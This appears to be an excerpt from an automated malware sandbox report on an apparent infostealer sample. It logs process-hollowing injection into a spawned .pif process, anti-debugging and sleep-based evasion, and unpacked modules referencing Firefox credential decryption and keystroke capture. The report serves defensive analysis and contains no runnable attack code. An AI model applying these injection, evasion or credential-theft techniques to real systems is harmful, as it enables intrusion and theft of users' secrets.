            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 28420000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 288E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 2A8E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,5_2_004019F0
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599080Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598621Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598513Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598296Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598185Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597183Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597075Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596170Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: threadDelayed 1829Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: threadDelayed 8017Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: foregroundWindowGot 1767Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -35971150943733603s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9116Thread sleep count: 1829 > 30Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9116Thread sleep count: 8017 > 30Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -599080s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598953s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598621s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598513s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598296s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598185s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597625s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597516s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597183s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -597075s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596170s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -594641s >= -30000sJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pif TID: 9108Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C52F8
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599080Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598621Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598513Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598296Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598185Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597183Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597075Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596170Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594531Jump to behavior
            Source: ja811MqV4h.exe, 00000000.00000002.1325858456.000000000092E000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3830052726.00000000268E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ja811MqV4h.exeAPI call chain: ExitProcess graph end nodegraph_0-25709
            Source: C:\Users\user\Links\daphpvwO.pifAPI call chain: ExitProcess graph end nodegraph_5-55895
            Source: C:\Users\user\Links\daphpvwO.pifProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029DA5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_029DA5B0
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CB110 LdrInitializeThunk,LdrInitializeThunk,5_2_2B5CB110
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,5_2_004019F0
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_029D3E20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040ADB0 GetProcessHeap,HeapFree,5_2_0040ADB0
            Source: C:\Users\user\Links\daphpvwO.pifProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0040CE09
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0040E61C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_00416F6A
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004123F1 SetUnhandledExceptionFilter,5_1_004123F1
            Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
            Source: C:\Users\user\Desktop\ja811MqV4h.exeMemory allocated: C:\Users\user\Links\daphpvwO.pif base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection unmapped: C:\Users\user\Links\daphpvwO.pif base address: 400000Jump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeMemory written: C:\Users\user\Links\daphpvwO.pif base: 2BE008Jump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pifJump to behavior
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager(k
            Source: daphpvwO.pif, 00000005.00000002.3834660252.000000002CB6E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ,Program Manager
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@zO
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4'
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPr(k
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C54BC
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: GetLocaleInfoA,0_2_029CA0B8
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: GetLocaleInfoA,0_2_029CA104
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C55C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: GetLocaleInfoA,5_2_00417A20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: GetLocaleInfoA,5_1_00417A20
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C8B38 GetLocalTime,0_2_029C8B38
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D9F00 GetUserNameA,0_2_029D9F00
